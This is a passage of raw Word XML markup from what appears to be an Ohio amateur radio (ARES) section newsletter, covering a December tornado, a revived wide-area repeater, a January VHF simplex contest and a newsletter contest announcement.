    <w:p w14:paraId="6B78DA0C" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="1651FA38" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C11ABEC" wp14:editId="1CFD3EC0">
            <wp:extent cx="5966810" cy="3114676"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64" name="Picture 64" descr="A picture containing outdoor, sky, bicy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A picture containing outdoor, sky, bicycle&#10;&#10;Description automatically generated"/>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71679" cy="3117218"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F8F38F" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">(Photos OHTF1) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A49E27" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">There was one tornado reported in Ohio from this system – an EF1 tornado touched down briefly at Ada, in Hardon County around 3 AM.  It was on the ground for 1.6 miles at 260 yards wide. Several roofs were damaged.  Otherwise, Ohio was just north of all the excitement. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1453F28C" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="738C970F" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">ARES and ham radio Skywarn operators were ready.  First word to the Section of the pending situation came from ASEC Bryan Hoffman, KC8EGV, who was concerned about the likelihood of Cincinnati getting involved in damaging storms.  Indications of the severity of these storms were such that the “Watch Desk Project” would have been activated on word that the system was actually continuing into Ohio.  Under that procedure, DMR and Fusion systems are bridged together giving static-free coverage over 225 repeaters across Ohio – allowing those with reports to easily reach the Ohio EMA, and those yet upstream to listen and evaluate their own actions if the system continued. As it was, Ohio ARES sent a quick message to the KY Section Manager Steve Morgan, W4NHO, offering any help he needed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738C0F1C" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="5F2C9E54" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">So we dodged a bullet in Ohio but that certainly doesn’t lessen our concern for those suffering in states south of us. We will keep those people in our prayers, of course. And we will take a close look at what WE would have required had this system continued only a few miles further north! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC2F1C7" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="4AC24366" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003817B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>An important addition!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A06D4F" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">I am enthusiastic about a new addition to our ability to communicate!   Keith Burnette, KB8GYB, has confirmed that Ohio ARES is absolutely welcomed to use the renewed wide-area-repeater system on 145.11 (67 tone).  The system has been brought back from the doldrums by the West Central Ohio Amateur Radio Association on two meters and at 224.160. Keith was gracious in reconfirming their agreements begun in 2000 that offer the system for use by W8SGT in support of the Ohio EMA. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8E2D97" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="7B77D50A" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">The system was first put together in the mid- 1980’s but fell out of use when supporting agencies changed or discontinued funding. After a series of donations and securing repeater sites the system is now being brought back.  This ability to cover a wide area of Central and Southwest Ohio as well as portions of Indiana and Kentucky will prove critical under just such conditions as mentioned above!  It will allow regular FM communications in the wider area which regularly sees storms and storm damage that would funnel to The Sarge.  I have programmed my own rigs with this, and the repeater is active and friendly!  Well done, WCOARA and thanks for service our many communities! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F34E302" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="6AF59FA9" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">I wish you all the best over the holidays – remembering why we have these holidays – and I hope to be able to see you (yes, actually SEE you) for a Spring ARES Conference in 2022.  We don’t have a date firmed up yet, but we’re enthusiastic that we will be able to gather in early April!  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFB11B9" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="3FCB9103" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="202124"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="202124"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>January's ARES VHF Plus simplex contest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E3E5D0" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="3653FDEC" w14:textId="4F410839" w:rsidR="008126B3" w:rsidRDefault="008126B3" w:rsidP="000E77ED"/>
    <w:p w14:paraId="0FB05247" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>In between your holiday endeavors, consider planning for the annual  Ohio ARES  VHF=plus simplex contest January 8</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A511B92" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149BAF92" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>For a great discussion of what the contest is ~really~ all about and what you can do to prepare, check out Matt Curtin’s YouTube report…he did a great job!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AB2D83" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FDBA47" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="0084211F" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId54" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="000B0A41" w:rsidRPr="000B0A41">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://youtu.be/jqn4pd1a75c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48E01EC4" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59093166" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The website for the contest is </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="000B0A41">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.ohsimplex.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50B8FAFB" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638162B9" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Hope to hear you on the air!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B5307D" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43123115" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF1CE45" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Stan, N8BHL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7682E629" w14:textId="77777777" w:rsidR="000B0A41" w:rsidRPr="000B0A41" w:rsidRDefault="000B0A41" w:rsidP="000B0A41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0A41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDDB08E" w14:textId="1FCB097C" w:rsidR="008126B3" w:rsidRDefault="008126B3" w:rsidP="000E77ED"/>
    <w:p w14:paraId="4B37A1FA" w14:textId="77777777" w:rsidR="008126B3" w:rsidRDefault="008126B3" w:rsidP="000E77ED"/>
    <w:p w14:paraId="05A2BFEA" w14:textId="4CFCE919" w:rsidR="00DA2224" w:rsidRPr="00DA2224" w:rsidRDefault="00DA2224" w:rsidP="00DA2224">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2224">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDCF33C" w14:textId="2443DD88" w:rsidR="00DA2224" w:rsidRDefault="00DA2224" w:rsidP="00DA2224">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56330D73" w14:textId="77777777" w:rsidR="00DA2224" w:rsidRPr="0031188E" w:rsidRDefault="00DA2224" w:rsidP="00DA2224">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="pic"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidRPr="0031188E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">From the Public Information Coordinator </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F97EAB6" w14:textId="77777777" w:rsidR="00DA2224" w:rsidRPr="00FD0EAD" w:rsidRDefault="00DA2224" w:rsidP="00DA2224">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>John Ross, KD8IDJ - PIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0365498A" w14:textId="32764790" w:rsidR="00160CDC" w:rsidRDefault="0084211F" w:rsidP="00160CDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidR="00160CDC" w:rsidRPr="005E72AA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>john.ross3@att.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DA2224" w:rsidRPr="0031188E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252909568" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78DE43E6" wp14:editId="2E9BD52F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4366895</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2430780" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21310"/>
                <wp:lineTo x="21498" y="21310"/>
                <wp:lineTo x="21498" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="27" name="Picture 27" descr="https://2.bp.blogspot.com/-oQO2ZhFk6aw/VBjpD66yEYI/AAAAAAAAAqM/nD52ReWN8sw1FQZIklfi8EF5VjzPNckUACPcBGAYYCw/s320/John%2BKD8IDJ-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2.bp.blogspot.com/-oQO2ZhFk6aw/VBjpD66yEYI/AAAAAAAAAqM/nD52ReWN8sw1FQZIklfi8EF5VjzPNckUACPcBGAYYCw/s320/John%2BKD8IDJ-small.jpg">
                      <a:hlinkClick r:id="rId57"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId58">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="13250" t="13000" r="7000"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2430780" cy="19888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EA42691" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC2E123" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8F6A4B" w14:textId="1DC01D8C" w:rsidR="00160CDC" w:rsidRDefault="001F0D5E" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42F6BD66" wp14:editId="1B80B752">
            <wp:extent cx="3577272" cy="1442171"/>
            <wp:effectExtent l="0" t="0" r="4445" b="5715"/>
            <wp:docPr id="43" name="Picture 43" descr="A picture containing text, outdoor object, night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picture containing text, outdoor object, night sky&#10;&#10;Description automatically generated"/>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631026" cy="1463842"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA92090" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1348456C" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5243E9C9" w14:textId="1D2FF105" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2022 OHIO SECTION NEWS LETTER CONTEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126C9758" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF6BDD8" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>By the time you read this it just might be 2022 and that means the OFFICIAL start of the Ohio Section Newsletter Contest!</w:t>
      </w:r>
    </w:p>
